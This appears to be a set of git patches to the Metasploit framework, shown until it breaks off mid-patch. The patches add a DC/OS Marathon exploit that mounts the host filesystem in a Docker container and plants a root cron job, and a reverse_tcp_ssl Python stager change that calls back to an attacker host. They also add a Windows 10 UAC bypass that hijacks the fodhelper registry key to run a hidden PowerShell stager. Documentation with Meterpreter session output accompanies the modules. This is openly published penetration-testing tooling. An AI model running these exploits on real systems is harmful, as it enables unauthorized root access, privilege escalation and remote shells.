From 0943eb24a96ade271a5f1b11eab1d258484710d1 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Fri, 3 Mar 2017 09:56:14 -0500 Subject: [PATCH 01/38] DC/OS Marathon UI Exploit --- modules/exploits/linux/http/dcos_marathon.rb | 201 +++++++++++++++++++ 1 file changed, 201 insertions(+) create mode 100644 modules/exploits/linux/http/dcos_marathon.rb diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb new file mode 100644 index 0000000000..9fdfe56591 --- /dev/null +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -0,0 +1,201 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DC/OS Marathon UI Docker Exploit', + 'Description' => %q{ + Utilizing the DCOS Cluster's Marathon UI, an attacker can create + a docker container with the '/' path mounted with read/write + permissions on the host server that is running the docker container. + As the docker container excutes command as uid 0 it is honored + by the host operating system allowing the attacker to edit/create + files owed by root. This exploit abuses this to creates a cron job + in the '/etc/cron.d/' path of the host server. + + *Notes: The docker image must be a valid docker image from + hub.docker.com. Further more the docker container will only + deploy if there are resources available in the DC/OS cluster. + }, + 'Author' => 'Erik Daguerre', + 'License' => MSF_LICENSE, + 'References' => [ + [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'], + ], + 'Payload' => + { + 'DisableNops'=> true, + }, + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + } + ] + ], + 'DefaultOptions' => { 'WfsDelay' => 75 }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 03, 2017')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']), + OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ]) + ], self.class) + end + + def get_apps + res = send_request_raw({ + 'method' => 'GET', + 'uri' => target_uri.path + }) + return unless res and res.code == 200 + + # verify it is marathon ui, and is returning content-type json + return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json' + apps = JSON.parse(res.body) + + apps + end + + def del_container(container_id) + res = send_request_raw({ + 'method' => 'DELETE', + 'uri' => normalize_uri(target_uri.path, container_id) + }) + return unless res and res.code == 200 + + res.code + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? + + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + payload_data = nil + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n" + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n" + command << "echo \"\" >> #{echo_cron_path}\n" + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n" + command << "sleep 120" + + command + end + + def make_container(mnt_path, cron_path, payload_path, container_id) + vprint_status('Setting container json request variables') + container_data = { + 'cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'cpus' => 1, + 'mem' => 128, + 'disk' => 0, + 'instances' => 1, + 'id' => container_id, + 'container' => { + 'docker' => { + 'image' => datastore['DOCKERIMAGE'], + 'network' => 'HOST', + }, + 'type' => 'DOCKER', + 'volumes' => [ + { + 'hostPath' => '/', + 'containerPath' => mnt_path, + 'mode' => 'RW' + } + ], + }, + 'env' => {}, + 'labels' => {} + } + + container_data + end + + def check + return Exploit::CheckCode::Safe if get_apps.nil? + + Exploit::CheckCode::Appears + end + + def exploit + if get_apps.nil? + fail_with(Failure::Unknown, 'Failed to connect to the targeturi') + end + # create required information to create json container information. + cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id() + + res = send_request_raw({ + 'method' => 'POST', + 'uri' => target_uri.path, + 'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json + }) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201 + + print_status('The docker container is created, waiting for it to deploy') + register_files_for_cleanup(cron_path, payload_path) + sleep_time = 5 + wait_time = datastore['WAIT_TIMEOUT'] + deleted_container = false + print_status("Waiting up to #{wait_time} seconds for docker container to start") + + while wait_time > 0 + sleep(sleep_time) + wait_time -= sleep_time + apps_status = get_apps + fail_with(Failure::Unkown, 'No apps returned') unless apps_status + + apps_status['apps'].each do |app| + next if app['id'] != "/#{container_id}" + + if app['tasksRunning'] == 1 + print_status('The docker container is running, removing it') + del_container(container_id) + deleted_container = true + wait_time = 0 + else + vprint_status('The docker container is not yet running') + end + break + end + end + + # If the docker container does not deploy remove it and fail out. + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container failed to start") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end From 6a83220131b437a905b3b3fc949c4473a034e2da Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Fri, 3 Mar 2017 10:49:00 -0500 Subject: [PATCH 02/38] cleaned up travis errors --- modules/exploits/linux/http/dcos_marathon.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 9fdfe56591..86327d2786 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -1,5 +1,5 @@ ## -# This module requires Metasploit: http//metasploit.com/download +# This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. - + *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. @@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote def make_container_id return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? - + rand_text_alpha_lower(8) end @@ -169,16 +169,16 @@ class MetasploitModule < Msf::Exploit::Remote wait_time = datastore['WAIT_TIMEOUT'] deleted_container = false print_status("Waiting up to #{wait_time} seconds for docker container to start") - + while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time apps_status = get_apps - fail_with(Failure::Unkown, 'No apps returned') unless apps_status - + fail_with(Failure::Unknown, 'No apps returned') unless apps_status + apps_status['apps'].each do |app| next if app['id'] != "/#{container_id}" - + if app['tasksRunning'] == 1 print_status('The docker container is running, removing it') del_container(container_id) @@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote break end end - + # If the docker container does not deploy remove it and fail out. unless deleted_container del_container(container_id) From a49c0a6824c1951eec56f89849f668832917713d Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Fri, 3 Mar 2017 11:03:25 -0500 Subject: [PATCH 03/38] removed trailing line --- modules/exploits/linux/http/dcos_marathon.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 86327d2786..dd7168532a 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. - *Notes: The docker image must be a valid docker image from + *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. }, From 3e9480ebfa1b5a6e5ff53949e9291f3d277a9b93 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Sat, 4 Mar 2017 09:50:30 -0500 Subject: [PATCH 04/38] Added documentation --- .../exploit/linux/http/dcos_marathon.md | 193 ++++++++++++++++++ 1 file changed, 193 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/dcos_marathon.md diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md new file mode 100644 index 0000000000..aec7d7c623 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dcos_marathon.md @@ -0,0 +1,193 @@ +# Vulnerable Application +Utilizing the DCOS Cluster's Marathon UI, an attacker can create +a docker container with the '/' path mounted with read/write +permissions on the host server that is running the docker container. +As the docker container excutes command as uid 0 it is honored +by the host operating system allowing the attacker to edit/create +files owed by root. This exploit abuses this to creates a cron job +in the '/etc/cron.d/' path of the host server. + +*Notes: The docker image must be a valid docker image from +hub.docker.com. Further more the docker container will only +deploy if there are resources available in the DC/OS + +## DCOS +This Expoit was tested with CentOS 7 as the host operating system for +the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with +Defualt 'custom' installation for on site premise setup. Only the Install +part of the DCOS guide was completed, the system hardening and securing +your cluster section where skipped. This is to represent a 'Defualt' install +with a system admin conducting hasty deployments taking no thought about security. + + +## To Setup Your Cluster +I recommend doing a 'On-Premies'/custom +cluster. https://dcos.io/docs/1.8/administration/installing/custom/ +Create a virtual CentOS machine, install requirements base on the above +guide. + +```bash +# The TLDR from the above guide +sudo systemctl stop firewalld && sudo systemctl disable firewalld +sudo yum install -y tar xz unzip curl ipset ntp +systemctl start ntpd +systemctl enable ntpd +sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \ + sudo groupadd nogroup && sudo reboot +``` + +Install a supported version of docker on the CentOS systems +https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/ + +```bash +# The TLDR of the above guide +sudo yum -y remove docker docker-common container-selinux +sudo yum -y remove docker-selinux +sudo yum install -y yum-utils +sudo yum-config-manager \ + --add-repo \ + https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo +sudo yum-config-manager --enable docker-testing +sudo yum makecache fast +sudo yum -y install docker-engine-1.11.2 +sudo systemctl start docker +sudo systemctl enable docker +sudo echo overlay > /etc/modules-load.d/overlay.conf +sudo reboot +``` + +Once the CentOS machine has rebooted, edit the systemctl +service file for docker and change the ExecStart- line to +`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://` +restart the docker service and verify it is running. +lastely generate ssh rsa keys for authentication. And update the +/etc/ssh/sshd_config file to support root login. + +```bash +ssh-keygen -t rsa -b 4096 +# Press enter until complete, DO NOT PUT A PASSWORD. +cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys +cat ~/.ssh/id_rsa # save the output you will need it for later +rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later +``` + +Shut down the CentOS vm, take a snapshot. (This will be your base) +clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. +Start both virtual machines. Login and get their current IP address. +I recommend giving them static IPs if you have further use for the cluster. + +From here use another linux machine with docker installed to finish +the installation process. I used a ubuntu machine with docker installed. + +Follow the custom CLI guide for creating the required files in +the genconf folder. +https://dcos.io/docs/1.8/administration/installing/custom/cli/ + +Example genconf/config.yaml +``` +--- +agent_list: +- 192.168.0.10 +bootstrap_url: file:///opt/dcos_install_tmp +cluster_name: DCOS +exhibitor_storage_backend: static +ip_detect_filename: /genconf/ip-detect +master_discovery: static +master_list: +- 192.168.0.9 +process_timeout: 10000 +resolvers: +- 8.8.8.8 +- 8.8.4.4 +ssh_port: 22 +ssh_user: root +``` +Example genconf/ip-detect +```bash +#!/usr/bin/env bash +set -o nounset -o errexit +export PATH=/usr/sbin:/usr/bin:$PATH +ip=$(ip addr show ens33) +echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1) +``` + +place your id_rsa ssh key into the genconf file and rename the +file to ssh_key and `chmod 0600 genconf/ssh_key` + +Deploying the cluster +in the folder containing the genconf folder do the following. +NOTE: if following the cli install from DCOS itself, it will fail +if you do --install-prereqs. It will install an unsupported version of +docker. + +```bash +curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh +chmod +x dcos_generate_config.sh +sudo ./dcos_generate_config.sh --genconf +sudo ./dcos_generate_config.sh --preflight +# If all preflight checks pass +sudo ./dcos_generate_config.sh --deploy +# get a cup of coffie +# wait a minute or two after deploy completes +sudo bash dcos_generate_config.sh --postflight +``` + +If all is passing navigate to http://:8080/ +You should see the Marathon UI web application. + +# Exploitation +This module is designed for attacker to leaverage the creatation of a +docker contianer with out authentication through the DCOS Marathon UI +to gain root access to the hosting server of the docker container +in the DCOS cluster. + +## Options +- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application +- RPORT is the Port the Marathon UI service is running on. +- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit. +- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps +- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start. +- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated + +## Steps to exploit with module +- [ ] Start msfconsole +- [ ] use exploit/linux/http/dcos_marathon +- [ ] Set the options appropriately and set VERBOSE to true +- [ ] Verify it creates a docker container and it successfully runs +- [ ] After a minute a session should be opened from the agent server + +## Example Output +``` +msf > use exploit/linux/http/dcos_marathon +msf exploit(dcos_marathon) > set RHOST 192.168.0.9 +RHOST => 192.168.0.9 +msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp +payload => python/meterpreter/reverse_tcp +msf exploit(dcos_marathon) > set LHOST 192.168.0.100 +LHOST => 192.168.0.100 +msf exploit(dcos_marathon) > set verbose true +verbose => true +msf exploit(dcos_marathon) > check +[*] 192.168.0.9:8080 The target appears to be vulnerable. +msf exploit(dcos_marathon) > exploit + +[*] Started reverse TCP handler on 192.168.0.100:4444 +[*] Setting container json request variables +[*] Creating the docker container command +[*] The docker container is created, waiting for it to deploy +[*] Waiting up to 60 seconds for docker container to start +[*] The docker container is running, removing it +[*] Waiting for the cron job to run, can take up to 60 seconds +[*] Sending stage (39690 bytes) to 192.168.0.10 +[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500 +[+] Deleted /etc/cron.d/FOWkTeZL +[+] Deleted /tmp/TIWpOfUR + +meterpreter > sysinfo +Computer : localhost.localdomain +OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016 +Architecture : x64 +System Language : en_US +Meterpreter : python/linux +meterpreter > +``` From 6c69e13e0004f2e60f8172af40809b48fb1ba887 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Sat, 4 Mar 2017 11:28:30 -0500 Subject: [PATCH 05/38] Updated based on comments --- .../modules/exploit/linux/http/dcos_marathon.md | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md index aec7d7c623..fcf52aa50f 100644 --- a/documentation/modules/exploit/linux/http/dcos_marathon.md +++ b/documentation/modules/exploit/linux/http/dcos_marathon.md @@ -73,11 +73,12 @@ rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later Shut down the CentOS vm, take a snapshot. (This will be your base) clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. -Start both virtual machines. Login and get their current IP address. -I recommend giving them static IPs if you have further use for the cluster. +Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. +Login and get their current IP address. +* Note: I recommend giving them static IPs if you have further use for the cluster. From here use another linux machine with docker installed to finish -the installation process. I used a ubuntu machine with docker installed. +the installation process. I used an ubuntu machine with docker installed. Follow the custom CLI guide for creating the required files in the genconf folder. @@ -132,18 +133,16 @@ sudo ./dcos_generate_config.sh --deploy sudo bash dcos_generate_config.sh --postflight ``` -If all is passing navigate to http://:8080/ +If all is passing navigate to http://[master_ip]:8080/ You should see the Marathon UI web application. # Exploitation -This module is designed for attacker to leaverage the creatation of a +This module is designed for the attacker to leaverage the creatation of a docker contianer with out authentication through the DCOS Marathon UI to gain root access to the hosting server of the docker container in the DCOS cluster. ## Options -- RHOST is the target IP/Hostname that is hosting the Marathon UI Web application -- RPORT is the Port the Marathon UI service is running on. - DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit. - TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps - WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start. From 73be4f1c2e8bc265c6db9594010e1d786fda2e31 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Thu, 4 May 2017 14:51:40 +0530 Subject: [PATCH 06/38] Adding StagerRetryWait option in reverse_tcp_ssl --- .../core/payload/python/reverse_tcp_ssl.rb | 26 +++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index e16eaf003a..cc11aaf135 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -22,7 +22,8 @@ module Payload::Python::ReverseTcpSsl def generate conf = { port: datastore['LPORT'], - host: datastore['LHOST'] + host: datastore['LHOST'], + retry_wait: datastore['StagerRetryWait'] } generate_reverse_tcp_ssl(conf) @@ -42,10 +43,25 @@ module Payload::Python::ReverseTcpSsl def generate_reverse_tcp_ssl(opts={}) # Set up the socket - cmd = "import ssl,socket,struct\n" - cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 - cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" - cmd << "s=ssl.wrap_socket(so)\n" + cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n" + if datastore['StagerRetryWait'].blank? # do not retry at all (old style) + cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 + cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" + cmd << "s=ssl.wrap_socket(so)\n" + else + cmd << "while 1:\n" + cmd << "\ttry:\n" + cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 + cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" + cmd << "\t\ts=ssl.wrap_socket(so)\n" + cmd << "\t\tbreak\n" + cmd << "\texcept:\n" + if datastore['StagerRetryWait'].to_i <= 0 + cmd << "\t\tpass\n" # retry immediately + else + cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting + end + end cmd << py_send_uuid if include_send_uuid cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" cmd << "d=s.recv(l)\n" From 74c08cebee3362e748469c8a8416c5d6807e46d9 Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 17:25:17 +0100 Subject: [PATCH 07/38] Add bypassuac fodhelper module for Windows 10 --- .../windows/local/bypassuac_fodhelper.rb | 208 ++++++++++++++++++ 1 file changed, 208 insertions(+) create mode 100644 modules/exploits/windows/local/bypassuac_fodhelper.rb diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb new file mode 100644 index 0000000000..71aeef84d2 --- /dev/null +++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb @@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Exploit::Powershell + include Post::Windows::Priv + include Post::Windows::Registry + include Post::Windows::Runas + + FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings" + FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" + EXEC_REG_DELEGATE_VAL = 'DelegateExecute' + EXEC_REG_VAL = '' # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ' + FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe" + CMD_MAX_LEN = 16383 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Escalate UAC Protection Bypass (Via FodHelper Registry Key)', + 'Description' => %q{ + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. + + This module modifies a registry key, but cleans up the key once the payload has + been invoked. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'winscriptingblog', # UAC bypass discovery and research + 'amaloteaux' , # MSF module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', + 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' + ] + ], + 'DisclosureDate'=> 'May 12 2017' + )) + end + + def check + if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + commspec = '%COMSPEC%' + registry_view = REGISTRY_VIEW_NATIVE + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] == ARCH_X64 + if session.arch == ARCH_X86 + # fodhelper.exe is x64 only exe + commspec = '%WINDIR%\\Sysnative\\cmd.exe' + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end + end + if target_arch.first == ARCH_X86 + # Invoking x86, so switch to SysWOW64 + psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" + end + else + # if we're on x86, we can't handle x64 payloads + if target_arch.first == ARCH_X64 + fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') + end + end + + if !payload.arch.empty? && !(payload.arch.first == target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + + # Validate that we can actually do things before we bother + # doing any more work + check_permissions! + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." + ) + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + payload_value = rand_text_alpha(8) + psh_path = expand_path(psh_path) + + template_path = Rex::Powershell::Templates::TEMPLATE_DIR + psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) + + if psh_payload.length > CMD_MAX_LEN + fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") + end + + psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" + cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" + + existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" + exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? + + if existing.empty? + registry_createkey(FODHELPER_WRITE_KEY, registry_view) + end + + print_status("Configuring payload and stager registry keys ...") + unless exist_delegate + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) + end + + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) + + # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. + cmd_path = expand_path(commspec) + cmd_args = expand_path("/c #{FODHELPER_PATH}") + print_status("Executing payload: #{cmd_path} #{cmd_args}") + + # We can't use cmd_exec here because it blocks, waiting for a result. + client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true}) + + # Wait a copule of seconds to give the payload a chance to fire before cleaning up + # TODO: fix this up to use something smarter than a timeout? + Rex::sleep(5) + + handler(client) + + print_status("Cleaining up registry keys ...") + unless exist_delegate + registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) + end + if existing.empty? + registry_deletekey(FODHELPER_DEL_KEY, registry_view) + else + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + end + registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) + + end + + def check_permissions! + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + + # Check if you are an admin + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + + unless is_in_admin_group? + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + + print_status('UAC is Enabled, checking level...') + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end From 092e7b96b80b576d99782b58c362a2b756d21cff Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 17:27:50 +0100 Subject: [PATCH 08/38] typo --- modules/exploits/windows/local/bypassuac_fodhelper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb index 71aeef84d2..b5f46e2ade 100644 --- a/modules/exploits/windows/local/bypassuac_fodhelper.rb +++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, - 'Name' => 'Windows Escalate UAC Protection Bypass (Via FodHelper Registry Key)', + 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', 'Description' => %q{ This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when From 6f1f630b0eaf406fff2822bb90ac3d9d88224e9d Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 19:17:26 +0100 Subject: [PATCH 09/38] add documentation --- .../windows/local/bypassuac_fodhelper.md | 89 +++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/bypassuac_fodhelper.md diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md new file mode 100644 index 0000000000..d84a7cc89a --- /dev/null +++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md @@ -0,0 +1,89 @@ +## Intro + + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. + + This module modifies a registry key, but cleans up the key once the payload has + been invoked. + + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + +## Usage + + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. + + +##Scenario + + +``` +msf > +[*] Sending stage (1189423 bytes) to 192.168.50.4 +[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100 + +msf > sessions -i 11 +[*] Starting interaction with 11... + +meterpreter > shell +Process 9496 created. +Channel 1 created. +Microsoft Windows [Version 10.0.14393] +(c) 2016 Microsoft Corporation. All rights reserved. + +C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label" +whoami /all | findstr /C:"Mandatory Label" +Mandatory Label\Medium Mandatory Level Label S-1-16-8192 + +C:\Users\sasha\Desktop>exit +exit +meterpreter > +Background session 11? [y/N] +msf > use exploit/windows/local/bypassuac_fodhelper +msf exploit(bypassuac_fodhelper) > set SESSION 11 +SESSION => 11 +msf exploit(bypassuac_fodhelper) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Windows 